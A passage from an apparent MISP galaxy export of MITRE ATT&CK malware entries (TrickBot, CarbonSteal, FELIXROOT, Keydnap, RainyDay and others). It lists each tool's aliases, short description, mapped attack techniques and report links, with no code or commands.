InnaputRAT - S0259 is also known as:

InnaputRAT

View relationships graph

InnaputRAT - S0259 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

Table 4999. Table References
Links
https://attack.mitre.org/software/S0259
https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

CarbonSteal - S0529

[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="CarbonSteal - S0529"

CarbonSteal - S0529 is also known as:

CarbonSteal

View relationships graph

CarbonSteal - S0529 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"

Table 5000. Table References
Links
https://attack.mitre.org/software/S0529
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

P8RAT - S0626

[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="P8RAT - S0626"

P8RAT - S0626 is also known as:

P8RAT
HEAVYPOT
GreetCake

View relationships graph

P8RAT - S0626 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"

Table 5001. Table References
Links
https://attack.mitre.org/software/S0626
https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

TrickBot - S0266

[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-malware="TrickBot - S0266"

TrickBot - S0266 is also known as:

TrickBot
Totbrick
TSPY_TRICKLOAD

View relationships graph

TrickBot - S0266 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"

Table 5002. Table References
Links
https://attack.mitre.org/software/S0266
https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf
https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n
https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick

FELIXROOT - S0267

[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)

The tag is: misp-galaxy:mitre-malware="FELIXROOT - S0267"

FELIXROOT - S0267 is also known as:

FELIXROOT
GreyEnergy mini

View relationships graph

FELIXROOT - S0267 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 5003. Table References
Links
https://attack.mitre.org/software/S0267
https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Keydnap - S0276

This piece of malware steals the content of the user’s keychain while maintaining a permanent backdoor (Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-malware="Keydnap - S0276"

Keydnap - S0276 is also known as:

Keydnap
OSX/Keydnap

View relationships graph

Keydnap - S0276 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Forking - T1564.009" with estimative-language:likelihood-probability="almost-certain"

Table 5004. Table References
Links
https://attack.mitre.org/software/S0276
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://www.synack.com/2017/01/01/mac-malware-2016/

SodaMaster - S0627

[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="SodaMaster - S0627"

SodaMaster - S0627 is also known as:

SodaMaster
DARKTOWN
dfls
DelfsCake

View relationships graph

SodaMaster - S0627 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 5005. Table References
Links
https://attack.mitre.org/software/S0627
https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

OBAD - S0286

OBAD is an Android malware family. (Citation: TrendMicro-Obad)

The tag is: misp-galaxy:mitre-malware="OBAD - S0286"

OBAD - S0286 is also known as:

OBAD

View relationships graph

OBAD - S0286 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

Table 5006. Table References
Links
https://attack.mitre.org/software/S0286
http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/

FYAnti - S0628

[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="FYAnti - S0628"

FYAnti - S0628 is also known as:

FYAnti
DILLJUICE stage2

View relationships graph

FYAnti - S0628 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5007. Table References
Links
https://attack.mitre.org/software/S0628
https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

Bisonal - S0268

[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018)

The tag is: misp-galaxy:mitre-malware="Bisonal - S0268"

Bisonal - S0268 is also known as:

Bisonal

View relationships graph

Bisonal - S0268 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 5008. Table References
Links
https://attack.mitre.org/software/S0268
https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

QUADAGENT - S0269

[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-malware="QUADAGENT - S0269"

QUADAGENT - S0269 is also known as:

QUADAGENT

View relationships graph

QUADAGENT - S0269 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 5009. Table References
Links
https://attack.mitre.org/software/S0269
https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

RainyDay - S0629

[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="RainyDay - S0629"

RainyDay - S0629 is also known as:

RainyDay

View relationships graph

RainyDay - S0629 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5010. Table References
Links
https://attack.mitre.org/software/S0629
https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

FruitFly - S0277

FruitFly is designed to spy on mac users (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="FruitFly - S0277"

FruitFly - S0277 is also known as:

FruitFly

View relationships graph

FruitFly - S0277 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
